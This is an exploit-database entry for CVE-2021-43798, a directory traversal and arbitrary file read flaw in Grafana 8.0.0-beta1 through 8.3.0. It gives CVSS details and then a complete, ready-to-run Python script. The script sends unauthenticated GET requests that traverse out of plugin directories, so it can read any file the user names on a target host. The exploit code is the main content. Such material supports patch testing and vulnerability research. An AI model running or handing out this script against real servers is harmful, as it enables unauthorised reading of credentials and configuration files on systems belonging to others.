Grafana 8.3.0 Directory Traversal / Arbitrary File Read

2021.12.09
Credit: s1gh
Risk: Medium
Local: No
Remote: Yes


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Exploit Title: Grafana 8.3.0 - Directory Traversal and Arbitrary File Read # Date: 08/12/2021 # Exploit Author: s1gh # Vendor Homepage: https://grafana.com/ # Vulnerability Details: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p # Version: V8.0.0-beta1 through V8.3.0 # Description: Grafana versions 8.0.0-beta1 through 8.3.0 is vulnerable to directory traversal, allowing access to local files. # CVE: CVE-2021-43798 # Tested on: Debian 10 # References: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p47p #!/usr/bin/env python3 # -*- coding: utf-8 -*- import requests import argparse import sys from random import choice plugin_list = [ "alertlist", "annolist", "barchart", "bargauge", "candlestick", "cloudwatch", "dashlist", "elasticsearch", "gauge", "geomap", "gettingstarted", "grafana-azure-monitor-datasource", "graph", "heatmap", "histogram", "influxdb", "jaeger", "logs", "loki", "mssql", "mysql", "news", "nodeGraph", "opentsdb", "piechart", "pluginlist", "postgres", "prometheus", "stackdriver", "stat", "state-timeline", "status-histor", "table", "table-old", "tempo", "testdata", "text", "timeseries", "welcome", "zipkin" ] def exploit(args): s = requests.Session() headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.' } while True: file_to_read = input('Read file > ') try: url = args.host + '/public/plugins/' + choice(plugin_list) + '/../../../../../../../../../../../../..' + file_to_read req = requests.Request(method='GET', url=url, headers=headers) prep = req.prepare() prep.url = url r = s.send(prep, verify=False, timeout=3) if 'Plugin file not found' in r.text: print('[-] File not found\n') else: if r.status_code == 200: print(r.text) else: print('[-] Something went wrong.') return except requests.exceptions.ConnectTimeout: print('[-] Request timed out. Please check your host settings.\n') return except Exception: pass def main(): parser = argparse.ArgumentParser(description="Grafana V8.0.0-beta1 - 8.3.0 - Directory Traversal and Arbitrary File Read") parser.add_argument('-H',dest='host',required=True, help="Target host") args = parser.parse_args() try: exploit(args) except KeyboardInterrupt: return if __name__ == '__main__': main() sys.exit(0)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top